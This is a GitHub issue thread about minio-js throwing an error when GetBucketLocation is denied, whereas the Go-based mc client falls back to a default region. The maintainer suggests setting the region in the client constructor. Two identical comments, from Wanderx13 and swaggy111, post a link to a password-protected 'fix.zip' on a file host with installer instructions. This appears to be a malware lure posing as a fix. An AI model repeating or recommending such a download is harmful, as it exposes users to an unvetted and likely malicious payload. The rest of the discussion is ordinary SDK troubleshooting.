### ISSUE TITLE
The behaviour differs from mc client

### ISSUE THREAD

**Issue by warjiang** [minio/minio-js#1337]
In on-prem scenario, we meed some problems, the case is that If the api `GetBucketLocation` be limited, minio-js cannot work, but [mc](https://github.com/minio/mc) can work
https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketLocation.html

the root cause is that different reponse handler for mc and minio-js, for minio-js, if the api `GetBucketLocation` 403, the sdk will throw error: 
https://github.com/minio/minio-js/blob/c8154001210ee92663afe95fcc26b1083f632b9a/src/internal/client.ts#L751-L806

for mc client, if the api `GetBucketLocation` 403, and the region in reponse is empty,  it will return the default location `us-east-1`

https://github.com/minio/minio-go/blob/21381fc6dd612fd7f1f03b1e5d5fddef4b6eae52/bucket-cache.go#L120-L172
![image](https://github.com/user-attachments/assets/c3cad995-68df-449f-8c20-b41b9ba81a72)

so I want that the minio-js sdk can have consist behaviour as mc client which use minio-go sdk underlay.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by warjiang** [comment]
@harshavardhana @prakashsvmx Could you plz have a look 😄

**Comment by prakashsvmx** [comment]
What do you mean by 
>If the api GetBucketLocation be limited,
?

do you mean the user's policy explicitly denies `GetBucketLocation`  ?

can you share the `mc admin trace -v <ALIAS>`  ?

**Comment by warjiang** [comment]
> What do you mean by
> 
> > If the api GetBucketLocation be limited,
> > ?
> 
> do you mean the user's policy explicitly denies `GetBucketLocation` ?
> 
> can you share the `mc admin trace -v <ALIAS>` ?

Yes. Our customer doesn't give the permission of  `GetBucketLocation`,  it's the problem of customer's s3 service.  For our scenario, we use minio-js sdk in our project, so the `mc admin trace -v <ALIAS> `  maybe not work.

**Comment by prakashsvmx** [comment]
> it's the problem of customer's s3 service.

Which s3 service is this?

have you tried passing the region to the client constructor like below?:
```javascript

const minioClient = new Minio.Client({
  endPoint: 'play.min.io',
  port: 9000,
  useSSL: true,
  accessKey: 'Q3AM3UQ867SPQQA43P2F',
  secretKey: 'zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG',
  
  region:"us-east-1" //set default region from the client 
})

```

**Comment by warjiang** [comment]
> have you tried passing the region to the client constructor like below?:

Yes, and it works. But the inconsistent behaviour of go and nodejs sdk make me confused, should we share the same behaviour in handle of GetBucketLocation as minio golang sdk.

**Comment by prakashsvmx** [comment]
minio-go is also used internally so it may have "more" .  but we will check with other sdks too. 

also feel free to send a PR with the changes.
